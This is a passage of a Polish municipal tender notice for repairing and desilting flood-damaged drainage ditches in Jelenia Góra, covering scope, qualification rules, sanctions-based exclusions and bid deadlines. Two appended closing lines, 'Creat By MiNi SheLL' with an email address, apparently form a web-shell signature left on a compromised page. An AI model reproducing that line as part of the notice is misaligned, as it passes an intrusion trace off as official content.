z dnia 10.03.2025 r.<br/><br/>Część III - Naprawa i udrożnienie rowu melioracyjnego zlokalizowanego przy ul. Wincentego Pola w Jeleniej Górze<br/><br/>1. Przedmiotem zamówienia jest naprawa i udrożnienie ubezpieczeń rowu melioracyjnego (R-K) zlokalizowanego przy ul. Wincentego Pola w Jeleniej Górze.<br/>2. Rów melioracyjny przy ul. Wincentego Pola zlokalizowany jest na działce: nr 408/1 AM 6, 408/3 AM 8, 408/2 i 443/1 AM 7, obręb Jelenia Góra 2.<br/>3. Łączna długość rowu wynosi 1 252 m, odcinek objęty zamówieniem obejmuje 850 m.<br/>4. Charakterystyka i opis uszkodzeń:<br/>Rów R-K odprowadza wody od strony wschodniej od ul. Wincentego Pola i uchodzi do rzeki Bóbr w km 214+425. Rów posiada koryto trapezowe, ubezpieczone płytami betonowymi ażurowymi (na ujściu na długości 30 m, oraz narzutem kamiennym na długości 5 m, pozostałe odcinki są nieubezpieczone) oraz średnią szerokość dna 0,8 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, doszło do akumulacji namułu w dnie rowu oraz lokalnych uszkodzeń ubezpieczeń brzegowych. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie i naprawę ubezpieczeń, w celu zachowania jego funkcji i zapobieżeniu dalszej degradacji uszkodzonych w czasie powodzi ubezpieczeń.<br/>Część robót po powodzi została wykonana, zakres prac obejmował odtworzenie przepustów oraz odcinkowe odmulenie rowu w jego zachodniej części. Wizja terenowa wykazała konieczność wykonania odmulenia 2 dopływów rowu R-K tj. R-K1 (na odcinku 120 m) oraz R-K2 (na odcinku 50 m).<br/>5. Zakres niezbędnych do wykonania prac obejmuje m.in.:<br/>1) Rów R-K<br/>a) odmulenie dna rowu warstwą 40 cm– 680 m, szerokość dna ok. 0,8 m, głębokość: ok. 1,5 m,<br/>b) rozplantowanie urobku z odmulenia wzdłuż górnej krawędzi rowu,<br/>c) uzupełnienie ubytków skarp i dna rowu z płyt ażurowych o wym. 0,6 x 0,4 – ok. 216 m2,<br/>d) wykonanie narzutu z kamienia łamanego w obrębie ujścia do rzeki Bóbr – ok. 6,8 m3,<br/>2) Dopływy do rowu R-K (rów R-K1 odcinek o dł. 120 i rów R-K2 50 m).<br/>a) odmulenie dna rowu warstwą 40 cm – ok. 170 m, szerokość dnia 0,8 m, głębokość: ok. 1,5 m,<br/>b) uzupełnienie wymytych płyt ażurowych – ok. 10m2.<br/><br/>Opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Warunków Zamówienia, w tym w załącznikach do opisu przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111240-2 - Roboty w zakresie odwadniania gruntu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria:<br/>1) Cena - 60%<br/>2) Termin realizacji przedmiotu zamówienia - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane obejmujące swoim zakresem naprawę i udrożnienie (ręczne i/lub mechaniczne odmulenie) rowów melioracyjnych zniszczonych w wyniku powodzi w mieście Jelenia Góra wraz z wywozem/rozplantowaniem urobku z odmulenia, a także uzupełnianie ubytków skarp i dna rowu.<br/>Rowy objęte niniejszym zamówieniem zostały uszkodzone w wyniku powodzi we wrześniu 2024 r.<br/>Zamówienie realizowane jest w ramach Specjalnego Programu Udzielania Pomocy Finansowej w Usuwaniu Skutków Powodzi dla Obszarów Objętych Stanem Klęski Żywiołowej w 2024 r. uchwalonego Uchwałą Zarządu Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej we Wrocławiu nr 100/2025 z dnia 10.03.2025 r.<br/><br/>Część IV – Naprawa i udrożnienie rowu melioracyjnego zlokalizowanego przy ul. Ludowej w Jeleniej Górze<br/><br/>1. Przedmiotem zamówienia jest naprawa ubezpieczeń z kamienia dna i skarp rowu zlokalizowanego przy ul. Ludowej w Jeleniej Górze wraz z jego udrożnieniem (odmuleniem).<br/>2. Rów melioracyjny przy ul. Ludowej zlokalizowany jest na działkach: nr 32 i nr 42/2 AM 2 obręb Cieplice VI.<br/>3. Łączna długość rowu wynosi 532 m, odcinek objęty zamówieniem obejmuje 226 m.<br/>4. Charakterystyka i opis uszkodzeń:<br/>Rów R-H1 odprowadza wody od strony zachodniej w kierunku ul. Wojewódzkiej i Ludowej, gdzie tuż przed drogą uchodzi do cieku R-H (nieobjętym dokumentacją, administrowanym przez PGW Wody Polskie – obszar działania Nadzoru Wodnego Jelenia Góra). Rów na odcinku między zabudowaniami posiada prostokątne koryto, obustronnie ubezpieczone murami oporowymi i średnią szerokość dna 1,0 m. W wyniku napływu wód jakie miało miejsce podczas powodzi, doszło do akumulacji namułu w dnie rowu, oraz lokalnych uszkodzeń ubezpieczeń brzegowych. Wobec czego istnieje konieczność przywrócenia przekroju właściwego koryta rowu poprzez odmulenie i naprawę ubezpieczeń, w celu zachowania jego funkcji i zapobieżeniu dalszej degradacji uszkodzonych w czasie powodzi murów, co z uwagi na bliskie sąsiedztwo zabudowy mieszkalnej i handlowej stanowi priorytet.<br/>5. Zakres niezbędnych do wykonania prac obejmuje m.in:<br/>a) odmulenie dna rowu warstwą 20 cm – 226 m, szerokość dna 1 m, głębokość: ok.1,5 m;<br/>b) ręczną rozbiórkę murów betonowych (uszkodzony mur oporowy) – ok. 2,2 m3;<br/>c) remont muru oporowego z kamieni, uzupełnienie ubytków w omurowaniu koryta rowu – ok. 2,2 m3;<br/>d) remont muru oporowego – respoinowanie powierzchni muru – ok. 723,2 m2;<br/>e) mycie muru myjką wysokociśnieniową – 723 m2.<br/>f) przetransportowanie urobku z odmulenia w miejsce składowania lub zagospodarowania – ok. 45 m3.<br/><br/>Opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Warunków Zamówienia, w tym w załącznikach do opisu przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111240-2 - Roboty w zakresie odwadniania gruntu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112100-6 - Roboty w zakresie kopania rowów</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria:<br/>1) Cena - 60%<br/>2) Termin realizacji przedmiotu zamówienia - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu dotyczące:<br/>zdolności do występowania w obrocie gospodarczym (DOTYCZY WSZYSTKICH CZĘŚCI):<br/>Zamawiający nie stawia konkretnego warunku w tym zakresie.<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów (DOTYCZY WSZYSTKICH CZĘŚCI):<br/>Zamawiający nie stawia konkretnego warunku w tym zakresie.<br/>sytuacji ekonomicznej lub finansowej (DOTYCZY WSZYSTKICH CZĘŚCI):<br/>Zamawiający nie stawia konkretnego warunku w tym zakresie.<br/>zdolności technicznej lub zawodowej:<br/>(DOTYCZY CZĘŚCI I, II, III):<br/>1) Wykonawca musi wykazać, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył z należytą starannością co najmniej jedno (1) zamówienie obejmujące swoim zakresem odmulanie rowów o długości min. 100 m.<br/>Uwaga: <br/>W przypadku złożenia oferty na więcej niż jedną (1) z wyżej wymienionych części zamówienia, Zamawiający uzna za spełniony warunek udziału w postępowaniu w zakresie „zdolności technicznej lub zawodowej” jeżeli Wykonawca wykaże się doświadczeniem i osobami w odniesieniu do jednej (1) z wyżej wymienionych części zamówienia.<br/><br/>(DOTYCZY CZĘŚCI IV):<br/>1) Wykonawca musi wykazać, że w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył z należytą starannością co najmniej jedno (1) zamówienie obejmujące swoim zakresem budowę, przebudowę lub remont muru z kamienia o powierzchni nie mniejszej niż 200 m2. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w art. 108 ust. 1 u.p.z.p., art. 7 ust. 1 „ustawy o przeciwdziałaniu” oraz w art. 109 ust. 1 pkt 4 u.p.z.p.<br/>1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 u.p.z.p., w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z treścią załącznika nr 4 do Tomu I SWZ.<br/>Oświadczenie, o którym mowa powyżej składa Wykonawca, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiot na którego zasobach polega Wykonawca.<br/>2) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 u.p.z.p. o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r., poz. 1616) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 5 do Tomu I SWZ.<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z centralnej ewidencji i informacji o działalności gospodarczej, w zakresie art. 109 ust. 1 pkt 4 u.p.z.p. sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt 10.2.2 ppkt 3) Tomu I SWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury wystawione nie wcześniej niż 3 miesiące przed upływem ich złożeniem.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w § 4 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r., poz. 2415 z późn. zm.), lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa ww. Rozporządzeniu, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego <br/>lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania osoby, której dokument miał dotyczyć.<br/>Wyżej wymienione dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu należy złożyć w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie – zgodnie z treścią załącznika nr 3 do Tomu I SWZ.<br/>„Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty”.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 u.p.z.p składają wraz z ofertą oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy – zgodnie z treścią<br/>załącznika nr 7 do Tomu I SWZ.<br/>2. Pozostałe wymagania zostały opisane w pkt 12 Tomu I SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w Tomie II SWZ &#34;Projekt umowy&#34;. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Miejscem składania ofert jest platforma zakupowa Miasta Jelenia Góra dostępna pod adresem: https://platformazakupowa.pl/pn/jeleniagora</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> DOTYCZY WSZYSTKICH CZĘŚCI:<br/>1. Termin realizacji przedmiotu zamówienia ustala się w terminie zgodnym z deklaracją Wykonawcy zawartą w formularzu oferty, w tym najdłuższy do 12 tygodni (co stanowi 84 dni) od daty zawarcia umowy.<br/>Zgodnie z treścią pkt 19 Tomu I SWZ termin realizacji przedmiotu zamówienia jest jednym z kryteriów oceny ofert i<br/>Wykonawca deklarujący krótszy termin realizacji zobowiązany będzie zrealizować przedmiot zamówienia w oferowanym terminie.<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby składa, wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – zgodnie z treścią załącznika nr 6 do Tomu I SWZ.<br/>3. Zamawiający nie określa dodatkowych wymagań związanych z zatrudnianiem osób, o których mowa w art. 96 ust. 2 pkt 2 u.p.z.p.<br/>4. Zamawiający nie przewiduje wizji lokalnej.<br/>5. Zamawiający informuje, że oprócz okoliczności, o których mowa w art. 108 ust. 1 u.p.z.p. oraz art. 109 ust. 1 pkt 4 u.p.z.p.<br/>- działając na podstawie art. 7 ust. 1 Ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z dnia 13 kwietnia 2022 r. (t. j. Dz. U. z 2025 r., poz. 514), dalej zwaną „ustawą o przeciwdziałaniu” wykluczy z postępowania o udzielenie zamówienia:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 „ustawy o przeciwdziałaniu”;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (t. j. Dz. U. z 2025 r. poz. 644) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 „ustawy o przeciwdziałaniu”;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia<br/>24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 „ustawy o przeciwdziałaniu”.

Creat By MiNi SheLL
Email: jattceo@gmail.com